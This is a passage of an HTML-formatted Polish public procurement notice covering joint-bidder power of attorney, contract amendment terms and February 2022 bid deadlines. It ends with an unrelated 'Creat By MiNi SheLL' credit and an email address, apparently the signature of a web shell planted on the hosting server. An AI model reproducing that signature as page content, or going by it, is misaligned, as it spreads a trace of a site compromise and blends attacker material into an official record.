się o udzielenie zamówienia publicznego, zaciąganie zobowiązań w<br/>imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, złożenie<br/>oferty wspólnie, prowadzenie korespondencji i podejmowanie zobowiązań związanych z<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>2. Dokument pełnomocnictwa musi być podpisany przez wszystkich wykonawców ubiegających<br/>się wspólnie o udzielenie zamówienia, w tym wykonawcę ustanowionego jako pełnomocnika i<br/>przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub<br/>ewidencji wykonawcy. Dokument pełnomocnictwa (oryginał lub kserokopia potwierdzona<br/>notarialnie), należy dołączyć do oferty w formie elektronicznej, podpisanej kwalifikowanym<br/>podpisem elektronicznym lub postaci elektronicznej podpisanej podpisem zaufanym lub<br/>osobistym.<br/>Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem<br/>występującym jako pełnomocnik pozostałych, przy czym płatności będą przekazywane wprost<br/>na konto danego podmiotu (wyłącznie wskazanego w umowie) lub na utworzone wspólne konto<br/>rozliczeniowe, na które wpłacane będą należności za świadczenia wykonane przez poszczególne podmioty.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>4. Zamawiający zastrzega sobie prawo do zażądania przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej zasady współpracy wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający nie przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem okoliczności wskazanych w<br/>art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umedbialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-03 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com